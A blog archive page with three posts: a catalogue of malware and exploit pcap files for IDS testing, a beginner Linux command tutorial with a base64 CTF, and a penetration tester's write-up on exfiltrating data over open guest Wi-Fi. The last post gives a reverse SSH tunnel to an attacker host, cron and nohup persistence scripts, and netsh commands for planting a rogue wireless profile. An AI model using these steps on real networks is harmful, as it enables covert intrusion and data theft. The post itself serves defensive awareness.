Monday, August 31, 2020

Collection Of Pcap Files From Malware Analysis


Update: Feb 19. 2015

We have been adding pcaps to the collection, so remember to check out the folder (Pcap collection) for the recent pcaps.

I had a project to test some malicious and exploit pcaps and collected a lot of them (almost 1000) from various public sources. You can see them in the PUBLIC folder. The credits go to the authors of the pcaps listed in the name of each file. Please visit their blogs and sites to see more information about the pcaps, see their recent posts, and send them thanks. The public pcaps have no passwords on them.




Update: Dec 13. 2014


Despite rare updates of this post, we have been adding pcaps to the collection, so remember to check out the folder (Pcap collection (New link)) for the recent pcaps!



Update: Dec 31. 2013 - added new pcaps

I did some spring cleaning yesterday and came up with these malware and exploit pcaps. Such pcaps are very useful for IDS and signature testing and development, general education, and malware identification. While there are some online public sandboxes offering pcaps for download, like Cuckoo or Anubis, looking for them is a tedious task and you cannot be totally sure the pcap is for the malware family supposedly analysed - in other words, if the sandbox says it is Zeus, that does not necessarily mean that it is.

I found some good pcap repositories here (http://www.netresec.com/?page=PcapFiles) but there are very few pcaps from malware.

These are from identified and verified (to the best of my knowledge and belief - email me if you find errors) malware samples.

All of them show the first stage with the initial callback and most have the DNS requests as well. A few pcaps show extended malware runs (e.g. purplehaze pcap is over 500mb).
Most pcaps are mine, a few are from online sandboxes, and one is borrowed from malware.dontneedcoffee.com. That said, I can probably find the corresponding samples for all that have MD5 listed if you really need them. Search contagio, some are posted with the samples.

Each file has the following naming convention:
BIN [RTF, PDF] - the filetype of the dropper used, malware family name, MD5, and year+month of the malware analysis.
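
The naming convention above can be parsed mechanically when indexing the collection for IDS and signature testing. The following Python sketch is an added example, not code from the original post; the field names, the regular expressions and the treatment of EK and OSX as type prefixes are assumptions based on the file names listed on this page.

```python
import re
from typing import NamedTuple, Optional

# BIN/RTF/PDF come from the convention; EK and OSX are assumed from the listing.
KNOWN_TYPES = {"BIN", "RTF", "PDF", "EK", "OSX"}

UPLOAD_RE = re.compile(r"^(\d{4}-\d{2}-\d{2})[ _]+")          # optional date prefix
SUFFIX_RE = re.compile(r"(?:[-.]pcap)?(?:\.zip)?$", re.IGNORECASE)
MD5_RE = re.compile(r"(?<![0-9a-f])[0-9a-f]{32}(?![0-9a-f])", re.IGNORECASE)
# Year+month of analysis; the month must be 01-12 and not run into more digits,
# so CVE ids such as "CVE-2011-2462" are not mistaken for a date.
ANALYSIS_RE = re.compile(r"[_-]((?:19|20)\d{2})[-_](0[1-9]|1[0-2])(?!\d)")


class PcapName(NamedTuple):
    uploaded: Optional[str]   # date prefix carried by some entries
    filetype: Optional[str]   # dropper type (first token)
    family: str               # malware family as written in the name
    md5: Optional[str]        # lower-cased MD5 of the sample, if present
    analysed: Optional[str]   # YYYY-MM of the analysis, if present


def parse_pcap_name(name: str) -> PcapName:
    rest = name.strip()
    uploaded = None
    m = UPLOAD_RE.match(rest)
    if m:
        uploaded, rest = m.group(1), rest[m.end():]
    rest = SUFFIX_RE.sub("", rest, count=1)

    md5 = None
    m = MD5_RE.search(rest)
    if m:
        md5 = m.group(0).lower()
        rest = rest[:m.start()] + rest[m.end():]

    analysed = None
    hits = list(ANALYSIS_RE.finditer(rest))
    if hits:                                  # the date is the last such field
        last = hits[-1]
        analysed = f"{last.group(1)}-{last.group(2)}"
        rest = rest[:last.start()] + rest[last.end():]

    tokens = [t for t in re.split(r"[_\s]+", rest) if t.strip("-")]
    has_type = bool(tokens) and tokens[0].upper() in KNOWN_TYPES
    filetype = tokens.pop(0).upper() if has_type else None
    family = "_".join(t.strip("-") for t in tokens)
    return PcapName(uploaded, filetype, family, md5, analysed)


# File names copied from the listing on this page.
SAMPLES = [
    "2012-12-31 BIN_Xinmic_8761F29AF1AE2D6FACD0AE5F487484A5-pcap",
    "BIN_Enfal_Lurid_0fb1b0833f723682346041d72ed112f9_2013-01.pcap",
    "PDF_CVE-2011-2462_Pdf_2011-12.pcap",
    "BIN_purplehaze-2012-01.pcap",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(parse_pcap_name(s))
```

Entries that break the convention (for example a mistyped year) simply come back with the affected field set to None, which makes them easy to review by hand.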

I will be adding more pcaps in the future. Please donate your pcaps from identified samples; I am sure many of you have them.

Thank you




Download


Download all together or separately.

All pcap archives have the same password (same scheme); email me if you need it. I tried posting them without any passwords and with the pass 'infected', but they get flagged as malware. Modern AV rips through zips and zips with the pass 'infected' with ease.



APT PCAPS


  1. 2012-12-31 BIN_Xinmic_8761F29AF1AE2D6FACD0AE5F487484A5-pcap
  2. 2013-09-08 BIN_TrojanPage_86893886C7CBC7310F7675F4EFDE0A29-pcap
  3. 2013-09-08 BIN_Darkcomet_DC98ABBA995771480AECF4769A88756E-pcap
  4. 2013-09-02 8202_tbd_ 6D2C12085F0018DAEB9C1A53E53FD4D1-pcap
  5. 2013-09-02 BIN_8202_6d2c12085f0018daeb9c1a53e53fd4d1-pcap
  6. 2013-09-02 BIN_Vidgrab_6fd868e68037040c94215566852230ab-pcap
  7. 2013-09-02 BIN_PlugX_2ff2d518313475a612f095dd863c8aea-pcap
  8. 2013-09-02 BIN_Taidoor_46ef9b0f1419e26f2f37d9d3495c499f-pcap
  9. 2013-09-02 BIN_Vidgrab_660709324acb88ef11f71782af28a1f0-pcap
  10. 2013-09-02 BIN_Gh0st-gif_f4d4076dff760eb92e4ae559c2dc4525-pcap.zip
  11. 2013-07-15 BIN_Taleret.E_5328cfcb46ef18ecf7ba0d21a7adc02c.pcap
  12. 2013-05-14 BIN_Mediana_0AE47E3261EA0A2DBCE471B28DFFE007_2012-10.pcap
  13. 2013-05-14 BIN_Hupigon_8F90057AB244BD8B612CD09F566EAC0C
  14. 2013-05-14 BIN_LetsGo_yahoosb_b21ba443726385c11802a8ad731771c0_2011-07-19
  15. 2013-05-13 BIN_IXESHE_0F88D9B0D237B5FCDC0F985A548254F2-2013-05-pcap
  16. 2013-05-06 BIN_DNSWatch_protux_4F8A44EF66384CCFAB737C8D7ADB4BB8_2012-11-pcap
  17. 2013-05-06 BIN_9002_D4ED654BCDA42576FDDFE03361608CAA_2013-01-30-pcap
  18. 2013-05-06 BIN_BIN_RssFeeder_68EE5FDA371E4AC48DAD7FCB2C94BAC7-2012-06-pcap (not a common name, see the traffic sheet http://bit.ly/maltraffic )
  19. 2013-04-30 BIN_MSWab_Yayih_FD1BE09E499E8E380424B3835FC973A8_us-pcap
  20. 2013-04-29 BIN_LURK_AF4E8D4BE4481D0420CCF1C00792F484_20120-10-pcap
  21. 2013-04-29 BIN_XTremeRAT_DAEBFDED736903D234214ED4821EAF99_2013-04-13-pcap
  22. BIN_Enfal_Lurid_0fb1b0833f723682346041d72ed112f9_2013-01.pcap
  23. BIN_Gh0st_variant-v2010_B1D09374006E20FA795B2E70BF566C6D_2012-08.pcap
  24. BIN_Likseput_E019E37F19040059AB5662563F06B609_2012-10.pcap
  25. BIN_Nettravler_1f26e5f9b44c28b37b6cd13283838366.pcap
  26. BIN_Nettravler_DA5832657877514306EDD211DEF61AFE_2012-10.pcap
  27. BIN_Sanny-Daws_338D0B855421867732E05399A2D56670_2012-10.pcap
  28. BIN_Sofacy_a2a188cbf74c1be52681f998f8e9b6b5_2012-10.pcap
  29. BIN_Taidoor_40D79D1120638688AC7D9497CC819462_2012-10.pcap
  30. BIN_TrojanCookies_840BD11343D140916F45223BA05ABACB_2012_01.pcap
  31. PDF_CVE-2011-2462_Pdf_2011-12.pcap
  32. RTF_Mongall_Dropper_Cve-2012-0158_C6F01A6AD70DA7A554D48BDBF7C7E065_2013-01.pcap
  33. OSX_DocksterTrojan.pcap

CRIMEWARE PCAPS



  1. 2013-11-12_BIN_ChePro_2A5E5D3C536DA346849750A4B8C8613A-1.pcap
  2. 2013-10-15_BIN_cryptolocker_9CBB128E8211A7CD00729C159815CB1C.pcap
  3. 2013-09-20_BIN_Lader-dlGameoverZeus_12cfe1caa12991102d79a366d3aa79e9.pcap
  4. 2013-09-08 BIN_Tijcont_845B0945D5FE0E0AAA16234DC21484E0-pcap
  5. 2013-09-08 BIN_Kelihos_C94DC5C9BB7B99658C275B7337C64B33-pcap.zip
  6. 2013-08-19 BIN_Nitedrem_508af8c499102ad2ebc1a83fdbcefecb-pcap
  7. 2013-08-17 BIN_sality_CEAF4D9E1F408299144E75D7F29C1810-pcap
  8. 2013-08-15 BIN_torpigminiloader-pcap.zip
  9. 2013-13-08 EK_popads_109.236.80.170_2013-08-13.pcap
  10. 2013-11-08 BIN_Alinav5.3_4C754150639AA3A86CA4D6B6342820BE.pcap
  11. 2013-08-08 BIN_BitcoinMiner_F865C199024105A2FFDF5FA98F391D74-pcap
  12. 2013-08-07 BIN_ZeroAccess_Sirefef_C2A9CCC8C6A6DF1CA1725F955F991940_2013-08-pcap
  13. 2013-07-05 BIN_Kuluoz-Asprox_9F842AD20C50AD1AAB41F20B321BF84B
  14. 2013-05-31 Wordpress-Mutopy_Symmi_20A6EBF61243B760DD65F897236B6AD3-2pcap.pcap
  15. 2013-05-15 BIN_Zeus_b1551c676a54e9127cd0e7ea283b92cc-2012-04.pcap
  16. 2013-05-15 BIN_Gypthoy_3EE49121300384FF3C82EB9A1F06F288-2013-05.pcap
  17. 2013-05-12 BIN_PassAlert_B4A1368515C6C39ACEF63A4BC368EDB2-2013-05-13
  18. 2013-05-12 BIN_HorstProxy_EFE5529D697174914938F4ABF115F762-2013-05-13-pcap
  19. 2013-05-12 BIN_Bitcoinminer_12E717293715939C5196E604591A97DF-2013-05-12-pcap
  20. 2013-05-07 BIN_ZeroAccess_Sirefef_29A35124ABEAD63CD8DB2BBB469CBC7A_2013-05-pcapc
  21. 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
  22. 2013-05-05 BIN_GameThief_ECBA0FEB36F9EF975EE96D1694C8164C_2013-03-pcap
  23. 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
  24. 2013-04-27 EK_BIN_Blackhole_leadingto_Medfos_0512E73000BCCCE5AFD2E9329972208A_2013-04-pcap
  25. 2013-04-26 -- BIN_Citadel_3D6046E1218FB525805E5D8FDC605361-2013-04-samp 
  26. BIN_CitadelPacked_2012-05.pcap
  27. BIN_CitadelUnpacked_2012-05.pcap
  28. BIN_Cutwail_284Fb18Fab33C93Bc69Ce392D08Fd250_2012-10.pcap
  29. BIN_Darkmegi_2012-04.pcap
  30. BIN_DarknessDDoS_v8g_F03Bc8Dcc090607F38Ffb3A36Ccacf48_2011-01.pcap-
  31. BIN_dirtjumper_2011-10.pcap
  32. BIN_DNSChanger_2011-12.pcap
  33. BIN_Drowor_worm_0f015bb8e2f93fd7076f8d178df2450d_2013-04.pcap
  34. BIN_Googledocs_macadocs_2012-12.pcap
  35. BIN_Imaut_823e9bab188ad8cb30c14adc7e67066d.pcap
  36. BIN_IRCbot_c6716a417f82ccedf0f860b735ac0187_2013-04.pcap
  37. BIN_Kelihos_aka_Nap_0feaaa4adc31728e54b006ab9a7e6afa.pcap
  38. BIN_LoadMoney_MailRu_dl_4e801b46068b31b82dac65885a58ed9e_2013-04 .pcap
  39. BIN_purplehaze-2012-01.pcap
  40. BIN_ponyloader_470a6f47de43eff307a02f53db134289.pcap
  41. BIN_Ramnitpcap_2012-01.pcap
  42. BIN_Reedum_0ca4f93a848cf01348336a8c6ff22daf_2013-03.pcap
  43. BIN_SpyEye_2010-02.pcap
  44. BIN_Stabuniq_F31B797831B36A4877AA0FD173A7A4A2_2012-12.pcap
  45. BIN_Tbot_23AAB9C1C462F3FDFDDD98181E963230_2012-12.pcap
  46. BIN_Tbot_2E1814CCCF0C3BB2CC32E0A0671C0891_2012-12.pcap
  47. BIN_Tbot_5375FB5E867680FFB8E72D29DB9ABBD5_2012-12.pcap
  48. BIN_Tbot_A0552D1BC1A4897141CFA56F75C04857_2012-12.pcap
  49. BIN_Tbot_FC7C3E087789824F34A9309DA2388CE5_2012-12.pcap
  50. BIN_Tinba_2012-06.pcap
  51. BIN_Vobfus_634AA845F5B0B519B6D8A8670B994906_2012-12.pcap
  52. BIN_Xpaj_2012-05.pcap
  53. BIN_ZeroAccess_3169969E91F5FE5446909BBAB6E14D5D_2012-10.pcap
  54. BIN_ZeusGameover_2012-02.pcap
  55. BIN_Zeus_2010-12.pcap
  56. EK_Blackholev1_2012-03.pcap
  57. EK_Blackholev1_2012-08.pcap
  58. EK_Blackholev2_2012-09.pcap
  59. EK_Blackhole_Java_CVE-2012-4681_2012-08.pcap
  60. EK_Phoenix_2012-04.pcap
  61. EK_Smokekt150(Malwaredontneedcoffee)_2012-09.pcap -  credit malware.dontneedcoffee.com




Linux Command Line Hackery Series - Part 3


Welcome back! I hope you are enjoying this series; I don't know about you, but I'm enjoying it a lot. This is part 3 of the series, and in this article we're going to learn some new commands. Let's get started.

Command: w
Syntax:      w
Function:   This simple command is used to see who is currently logged in and what they are doing, that is, their processes.

Command:  whoami
Syntax:       whoami
Function:     This is another simple command, which is used to print the user name associated with the current effective user ID.

Try it and it will show your user name.

If you want information about a particular user, whether it is you or someone else, there is a command for that as well.

Command: finger
Syntax:      finger [option] [username]
Function:   finger is a user information lookup program. The [] around the arguments means that these arguments are optional; this convention is used throughout this series.

In order to find information about your current user you can simply type:

finger username

Here username is your current username.
To find information about root you can type:

finger root

and it will display info about the root user.

Command: uname
Syntax:      uname [options]
Function:   uname is used to display information about the system.

uname is mostly used with the -a flag, which means display all information, like this:

uname -a

Command: df
Syntax:      df [option] [FILE ...] 
Function:   df is used to display the amount of space available.
If you type df in your terminal and then hit enter, you'll see the used and available space of every drive currently mounted on the system. However, the information is displayed in block-size, which is not very human friendly. But don't worry, we can get human-friendly output from df as well by typing:

df -h

The -h flag is used to display the used and available space in a more user-friendly format.
We can also view the info of a single drive by specifying the drive name after df, like this:

df -h /dev/sda2

That's it for now about df, let's move on.

Command:  free
Syntax:       free [options]
Function:    free is used to display the amount of free and used physical memory and swap memory in the system.
Again, the displayed information is in block-size; to get a more human-readable format, use the -h flag like this:

free -h

Command: cal
Syntax:      cal [options]
Function:    cal stands for calendar. It is used to display the calendar.

If you want to display the current date on the calendar, you can simply type:

cal

and wohooo! You get a nice-looking calendar on screen with the current date marked. But what if you want to display the calendar of a previous month? Well, you can do that as well. Say you want to display the calendar of Jan 2010; then you'll have to type:

cal -d 2010-01

Nice little handy tool, isn't it?

Command: file
Syntax:      file filename ...
Function:   file is an awesome tool used to classify a file, that is, to determine the file type.

Let's demonstrate the usage of this command by solving a Noob's CTF challenge using the file and base64 commands. We'll talk about the base64 command in a bit. Go to the InfoSecInstitute CTF Website. What you need to do here is save the broken image file on your local computer in your home directory. After saving the file, open your terminal (if it isn't open already). Move to your home directory and then check what type of file it is using the file command:

cd
file image.jpg

Shocking output? The file command has identified the above file as an ASCII text file, which means it is not an image file but a text file. Now it's time to see its contents, so we'll type:

cat image.jpg

What is that? It's some kind of gibberish. Well, it's base64-encoded text. We need to decode it. Let's learn how to do that.

Command: base64
Syntax:       base64 [option] FILE ...
Function:    base64 command is used to encode/decode data and then print it to stdout.

To encode some text in base64 format, we simply type base64 and hit enter, then start typing the text in the terminal. When done, hit enter again and then press CTRL+D, like this:

base64
some text here
<CTRL+D>
c29tZSB0ZXh0IGhlcmUK        # output - the encoded string

But in the above CTF we've got base64-encoded data that we need to decode. How are we going to do that? It's simple:

base64 -d image.jpg

There you go, you've captured the flag.
The -d flag here specifies that we want to decode instead of encode, and after it comes the name of the file we want to decode.
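
The same two checks (does the content match the extension, and is the text actually base64?) are routine when triaging files whose names cannot be trusted. The Python sketch below is an added example, not part of the original article; the function names, the small magic-number table and the sample inputs are assumptions made for illustration, and it goes slightly beyond the CTF by also identifying what the decoded payload is.

```python
import base64
import binascii
import os
import re

# A few well-known magic numbers; file(1) knows thousands more.
MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
EXT_TO_KIND = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png",
               ".gif": "gif", ".pdf": "pdf"}
B64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")


def sniff(data: bytes) -> str:
    """Classify content by its leading bytes, like a tiny file(1)."""
    for kind, signatures in MAGIC.items():
        if data.startswith(signatures):
            return kind
    if data and all(b in b"\t\n\r" or 32 <= b < 127 for b in data):
        return "ascii-text"
    return "unknown"


def try_base64(data: bytes):
    """Return the decoded bytes if data is well-formed base64, else None."""
    compact = b"".join(data.split())      # base64(1) wraps its output lines
    if len(compact) < 8 or len(compact) % 4 or not B64_RE.fullmatch(compact):
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except binascii.Error:
        return None


def triage(filename: str, data: bytes) -> dict:
    """Compare the type claimed by the extension with the actual content."""
    ext = os.path.splitext(filename)[1].lower()
    claimed = EXT_TO_KIND.get(ext, "unknown")
    actual = sniff(data)
    report = {"claimed": claimed, "actual": actual,
              "mismatch": claimed != actual,
              "decoded": None, "decoded_kind": None}
    if actual == "ascii-text":
        payload = try_base64(data)
        if payload is not None:
            report["decoded"] = payload
            report["decoded_kind"] = sniff(payload)
    return report


# Constructed samples: a text file posing as a JPEG (as in the CTF), a real
# JPEG header, and a base64-wrapped PNG header.
CTF_LIKE = base64.encodebytes(b"flag{constructed_example}\n")
REAL_JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"
WRAPPED_PNG = base64.encodebytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 8)

if __name__ == "__main__":
    for name, blob in [("image.jpg", CTF_LIKE), ("photo.jpg", REAL_JPEG_HEADER),
                       ("readme.txt", WRAPPED_PNG)]:
        print(name, triage(name, blob))
```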

Voila!
So now you're officially a Hacker! Sorry no certificates available here :)

That's it for this article; meet ya soon in the upcoming article.

Sunday, August 30, 2020

Backchannel Data Exfiltration Via Guest/R&D Wi-Fi


Oftentimes I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioned, the business units describe a low value network, which is simply an internet pass-through separate from the internal network. This sounds reasonable and almost plausible; however, I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client-side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more than the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering, DLP, proxy filtering and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished by dual homing your attack host using multiple NICs, which are standard on almost all modern machines. Whether this is from a physical access breach or via remote compromise, the results can be deadly. Below are a few scenarios which can lead to undetectable data exfiltration.




Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug, or a Linux host with a wireless card, is installed into the target network. I usually install pwn-plugs inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker-owned host. Typically it's a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However, if there is network egress and proxy filtering present, then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail, unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via Metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather than play the obfuscation game, I prefer to bypass the restrictions altogether using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000:127.0.0.1:22 root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward, you now have access into the internal network via an encrypted tunnel which will not be detected and will fully bypass any corporate security restrictions. You can take this a bit further and set up some persistence in case the shell goes down. This can be done via bash and nohup if you set up some ssh keys to handle authentication. One example could be the following script:

Your bash script: 
#---------------------
#!/bin/bash
while true
do
 ssh -R 3000:127.0.0.1:22 root@remoteHost.com
 sleep 10
done
#---------------------

Run this with nohup like this:
nohup ./shell.sh &


Another simple way would be to set up a cron job to run a script with your ssh command on a specified interval, for example every 5 minutes, like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh



Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern Windows machine with a wireless card. This can be used to make a wireless connection outbound, similar to the first scenario, which will bypass restrictions by accessing an unrestricted network. As shown in the "Vista Power Tools" paper written by Josh Wright, you can use a modern Windows machine's wireless card via the command line.
http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf

Below are the commands to profile the networks, export a current profile, and then import a new profile for your target wireless network. From there you can connect and use that network to bypass corp restrictions, provided that the wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.
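
From the defender's side, the same `netsh wlan show interfaces` output can be collected from corporate endpoints and audited for the condition this scenario depends on: a company asset associated with an open or unapproved SSID. The Python sketch below is an added example, not part of the original post; the function names, the approved-SSID list and the sample output are constructed for illustration, and it assumes English-locale netsh output.

```python
import re

# "Key   : value" lines; the first colon separates key from value, so MAC
# addresses in the value are kept intact.
FIELD_RE = re.compile(r"^\s*([^:]+?)\s*:\s?(.*)$")


def parse_interfaces(output: str) -> list:
    """Split netsh output into one dict per wireless interface."""
    interfaces, current = [], None
    for line in output.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "Name":                 # each interface block starts here
            current = {}
            interfaces.append(current)
        if current is not None:           # ignore the banner before any block
            current[key] = value
    return interfaces


def audit_wlan(output: str, approved_ssids: set) -> list:
    """Flag connected interfaces on unapproved or unauthenticated networks."""
    findings = []
    for nic in parse_interfaces(output):
        if nic.get("State") != "connected":
            continue
        reasons = []
        if nic.get("SSID") not in approved_ssids:
            reasons.append("ssid-not-approved")
        if nic.get("Authentication", "").lower() == "open":
            reasons.append("open-authentication")
        if reasons:
            findings.append({"interface": nic["Name"],
                             "ssid": nic.get("SSID"),
                             "reasons": reasons})
    return findings


# Constructed sample output (not captured from a real host).
SAMPLE_OUTPUT = """
There are 2 interfaces on the system:

    Name                   : Wi-Fi
    Description            : Constructed Wireless Adapter
    Physical address       : 02:00:00:00:00:01
    State                  : connected
    SSID                   : R&D
    BSSID                  : 02:00:00:00:00:aa
    Authentication         : Open
    Cipher                 : None
    Profile                : R&D

    Name                   : Wi-Fi 2
    Description            : Constructed Wireless Adapter #2
    Physical address       : 02:00:00:00:00:02
    State                  : connected
    SSID                   : CorpNetwork
    BSSID                  : 02:00:00:00:00:bb
    Authentication         : WPA2-Enterprise
    Cipher                 : CCMP
    Profile                : CorpNetwork
"""

if __name__ == "__main__":
    for finding in audit_wlan(SAMPLE_OUTPUT, {"CorpNetwork"}):
        print(finding)
```

Findings from such an audit are most useful when correlated with wired link state, since a host that is on the corporate LAN and an open SSID at the same time is dual-homed in exactly the way described above.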

I just got thinking the other day of ways to abuse so-called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all too often that a cable connection not linked to the corporate network is totally safe, and I call bullshit on that.
